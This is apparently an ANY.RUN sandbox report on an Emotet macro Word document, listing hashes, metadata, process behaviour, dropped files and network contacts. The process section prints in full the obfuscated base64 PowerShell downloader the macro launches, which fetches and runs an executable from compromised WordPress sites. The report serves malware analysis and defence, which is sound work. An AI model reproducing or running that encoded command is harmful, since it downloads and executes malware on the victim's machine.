analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

EzEzMusT53

Full analysis: https://app.any.run/tasks/5621263e-a114-4a3e-a69e-aef31b5fa3ca
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 30, 2020, 11:18:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: A., Author: Tho Perez, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 24 11:05:00 2020, Last Saved Time/Date: Thu Sep 24 11:05:00 2020, Number of Pages: 1, Number of Words: 2232, Number of Characters: 12728, Security: 8
MD5:

CD09B25593696A6909FCA5E8522E4D33

SHA1:

437D80F19E3DEEFEC51563E63325E339FB897AC2

SHA256:

C41A64F8CC1B83DB074A5A46AB347757BAC48D2D24AFA28E22514684F52A9E65

SSDEEP:

1536:mPiRmz80TdayTTtlj8S1PyswwPOhjS8lIAkAkB445TEgrO3jSWAg83tle1ZZ029Z:T422TWTogk079THcpOu5UZ+jQ4y/j3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • POwersheLL.exe (PID: 3192)

    • Executes application which crashes

      • POwersheLL.exe (PID: 3192)

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3192)

    • PowerShell script executed

      • POwersheLL.exe (PID: 3192)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3460)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: A.
Subject: -
Author: Théo Perez
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:24 10:05:00
ModifyDate: 2020:09:24 10:05:00
Pages: 1
Words: 2232
Characters: 12728
Security: Locked for annotations
Company: -
Lines: 106
Paragraphs: 29
CharCountWithSpaces: 14931
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
3
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3460"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EzEzMusT53.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3192POwersheLL -ENCOD JABFADUAZQA4AG0AcAA4AD0AKAAoACcAUQB2ACcAKwAnAHIAJwApACsAKAAnADkAZwAnACsAJwBxAGcAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAFIAUAByAG8AZgBpAEwARQBcAEUAWAB5AGEAcwA2ADgAXABYAF8AWABFADAAOABfAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAQwB0AE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAGAAUgBgAGkAVABZAGAAUAByAG8AVABgAG8AQwBvAGwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAxADIALAAnACsAJwAgAHQAJwArACcAbAAnACkAKwAnAHMAJwArACgAJwAxADEALAAnACsAJwAgACcAKQArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQAWQBiADQAeAAwADgANAAgAD0AIAAoACcAUQAnACsAKAAnAGkAYwAnACsAJwB4AHIAJwApACsAKAAnAGUAJwArACcAegBjACcAKQApADsAJABLAGQAdABpAG4AeABiAD0AKAAoACcAQQAnACsAJwBxAGYAMwA4ACcAKQArACcANAAnACsAJwAzACcAKQA7ACQAWQB3AG0AXwB0ADYAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAJwArACcAfQBFACcAKwAnAHgAeQAnACsAJwBhAHMANgA4AHsAMAB9AFgAXwB4AGUAJwArACcAMAAnACsAJwA4AF8AewAwACcAKwAnAH0AJwApAC0AZgAgACAAWwBjAGgAQQBSAF0AOQAyACkAKwAkAFkAYgA0AHgAMAA4ADQAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABNAG8AOABuAF8ANABxAD0AKAAoACcAQgAnACsAJwBzADIANgAnACkAKwAoACcAbQBsACcAKwAnAGIAJwApACkAOwAkAFkAbABfAGMAcwB6AG8APQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAGIAQwBMAEkAZQBuAHQAOwAkAEEAZQBnAHAAXwAwAGMAPQAoACcAaAB0ACcAKwAnAHQAcAAnACsAKAAnADoALwAvAGgAJwArACcAMgBhADEALgBjAG8AJwArACcAbQAvAHUAJwArACcAZgAnACsAJwA4AHYAdQAnACsAJwAvACcAKQArACcAVQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcALgBhACcAKQArACgAJwBsAG0AJwArACcAYQBrACcAKQArACcAYQAnACsAKAAnAGEAcwBlACcAKwAnAGIALgBjACcAKwAnAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBpAG4AYwBsACcAKwAnAHUAZAAnACsAJwBlAHMALwBQAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAOgAnACsAKAAnAC8AJwArACcALwB0ACcAKQArACcAaAAnACsAJwBlACcAKwAnAGkAJwArACgAJwB0AG4AYwAnACsAJwBvAG4AJwApACsAKAAnAHMAdQBsAHQAJwArACcAYQBuAHQAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AdwAnACsAKAAnAHAALQBpACcAKwAnAG4AYwBsACcAKQArACgAJwB1ACcAKwAnAGQAZQBzAC8AJwApACsAKAAnAHQAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAJwAvACcAKwAnAC8AYwAnACsAKAAnAGEAcgBzACcAKwAnAHQAYQByAGEAJwApACsAKAAnAGkALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAGkAYwBvAG4ALwBEACcAKQArACgAJwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwBiACcAKwAnAHUAZwAuACcAKQArACgAJwBjAGgAJwArACcAaQBoAHUAYQAnACsAJwBoAHUAJwApACsAKAAnAGEAbQBlAGQAaQBhACcAKwAnAHAAcgAnACsAJwBvAGoAZQBjAHQAcwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAKAAnAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnAHUALwAqAGgAJwArACcAdAAnACkAKwAoACcAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AYQBlACcAKwAnAGMAYwAuAGQAZQB2AC4AYwBhAHYAJwApACsAKAAnAGUAJwArACcAaQBtACcAKQArACgAJwAuAG4AZQAnACsAJwB0AC8AdwBwAC0AJwApACsAJwBhAGQAJwArACcAbQAnACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGQAWgAnACkAKwAnAC8AJwArACgAJwAqAGgAJwArACcAdAAnACkAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHAAaABpAG0AcwBlACcAKQArACgAJwB4AC4AMgAnACsAJwB4AHgAaAB1ACcAKwAnAGIALgAnACsAJwBjAG8AbQAvAHcAcAAtACcAKwAnAGMAJwApACsAJwBvACcAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AZQAnACsAJwBzACcAKQArACgAJwBwAC8ANQB1AHIAOABkACcAKwAnAHIAYgBtACcAKwAnAGEALwAnACkAKwAnADYAcQAnACsAJwBIAC8AJwApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEIAaAAwAGwAbwA5AGoAPQAoACgAJwBMADYAZgAnACsAJwBfAGEANAAnACkAKwAnADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATQBwAG8AaQBrAGUAZgAgAGkAbgAgACQAQQBlAGcAcABfADAAYwApAHsAdAByAHkAewAkAFkAbABfAGMAcwB6AG8ALgAiAGQATwBXAG4AYABMAG8AYABBAGAARABGAGkATABFACIAKAAkAE0AcABvAGkAawBlAGYALAAgACQAWQB3AG0AXwB0ADYAcgApADsAJABJADkAYQAyADMAMQAxAD0AKAAnAFEAJwArACgAJwB6AGcAJwArACcANwA4AGgAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABZAHcAbQBfAHQANgByACkALgAiAEwAZQBOAGAAZwB0AGgAIgAgAC0AZwBlACAAMwAzADkAOQA3ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAFkAdwBtAF8AdAA2AHIAKQA7ACQAQQAxADEANgBxAGwAdAA9ACgAKAAnAFoAOQBlAHgAJwArACcAcgAnACkAKwAnADQAagAnACkAOwBiAHIAZQBhAGsAOwAkAEgAdABwAGwAbABuAG0APQAoACcASgB6ACcAKwAoACcAegAnACsAJwAzAG4AJwApACsAJwBiAGkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAHUAYQBjAGEAdgA2AD0AKAAnAE0AJwArACgAJwB3ADQAMwAnACsAJwB3ACcAKwAnADAAZgAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3168"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exePOwersheLL.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 275
Read events
1 385
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC4A8.tmp.cvr
MD5:
SHA256:
3192POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q2D8VLWN52U4PT5Z8APV.temp
MD5:
SHA256:
3168ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsF54D.tmp
MD5:
SHA256:
3168ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsF54E.tmp
MD5:
SHA256:
3192POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bd051.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
3460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$EzMusT53.docpgc
MD5:147BF355B6886738654A58F683C1FB60
SHA256:B89EA5DC7F13D48763AAE199B96120A493F94AE3246D2604FA83C4CB156A9C97
3192POwersheLL.exeC:\Users\admin\Exyas68\X_xe08_\Qicxrezc.exehtml
MD5:FCAAC3CCBCF3DC3EC73E49E7BFCB7391
SHA256:4362331491F519FFDA457933B0274FA7928C62C2D5501A388B8841EB7D839906
3460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:766C240584608451660D48F762E0764B
SHA256:A020E4E40D9A1E7FA778F6FEEA2469104B0531A594E7D3AB7C92AAD876059E32
3460WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E4181D6069B0CB6C76D769DC6A53A57F
SHA256:D241318699EAF83A7EC22A8C7E03820C0A9F01B53C6B56C39D40C8C81A09B9C8
3192POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3192
POwersheLL.exe
GET
301
192.185.94.102:80
http://www.almakaaseb.com/wp-includes/P/
US
unknown
3192
POwersheLL.exe
GET
200
192.185.94.102:80
http://www.almakaaseb.com/pacan-so-tatuirovkoj-nate-osobe-ne-byl-v-silah/
US
html
52.6 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3192
POwersheLL.exe
142.11.205.127:80
h2a1.com
Hostwinds LLC.
US
unknown
3192
POwersheLL.exe
192.185.94.102:80
www.almakaaseb.com
CyrusOne LLC
US
unknown

DNS requests

Domain
IP
Reputation
h2a1.com
  • 142.11.205.127
suspicious
www.almakaaseb.com
  • 192.185.94.102
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
EzEzMusT53